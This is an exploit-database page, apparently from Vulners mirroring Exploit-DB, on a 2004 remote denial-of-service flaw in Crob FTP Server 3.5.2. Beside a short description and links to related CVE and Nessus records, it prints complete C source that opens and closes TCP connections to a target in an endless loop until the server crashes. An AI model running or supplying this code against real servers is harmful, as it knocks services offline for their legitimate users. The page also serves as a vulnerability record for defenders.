Lucene search
+L

Crob FTP Server 3.5.2 - Remote Denial of Service

🗓️ 12 Feb 2004 00:00:00Reported by gsichtType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

Crob FTP Server is vulnerable to remote denial of service causing server crashes.

Related
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
Crob FTP Server Connection Saturation Remote DoS
20 Aug 200400:00
nessus
Tenable Nessus
Crob FTP Server Connection Saturation Remote DoS
17 Feb 200400:00
nessus
CVE
CVE-2004-0282
18 Mar 200405:00
cve
Cvelist
CVE-2004-0282
18 Mar 200405:00
cvelist
EUVD
EUVD-2004-0282
7 Oct 202500:30
euvd
NVD
CVE-2004-0282
23 Nov 200405:00
nvd
// source: https://www.securityfocus.com/bid/9651/info

It has been reported that the Crob FTP server is prone to a remote denial of service vulnerability. An attacker may exploit this issue to cause the affected server to crash, denying service to legitimate users.

/******************************/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char *argv[])
{

  int s;
  struct sockaddr_in target;

  if(argc < 2)
    {
      printf("Usage: %s HOST [PORT]\n\n",argv[0]);
      return 0;
    }

        do
	  {
	    s = socket(AF_INET, SOCK_STREAM, 0);
	    target.sin_family = AF_INET;
	    target.sin_port = htons(atoi(argv[2]));
	    target.sin_addr.s_addr = inet_addr(argv[1]);

	    printf("-       connecting...\n");

	    if( connect(s,(struct sockaddr*)&target, sizeof(struct sockaddr))<0)
	      {
                printf("        connect() error!\n\n");
                exit(-1);
	      }

	    printf("        connected\n");
	    printf("        closing connection\n");
	    close(s);
	  }
        while(1);
        return 0;
}
/*******************************/

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Dec 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03134
24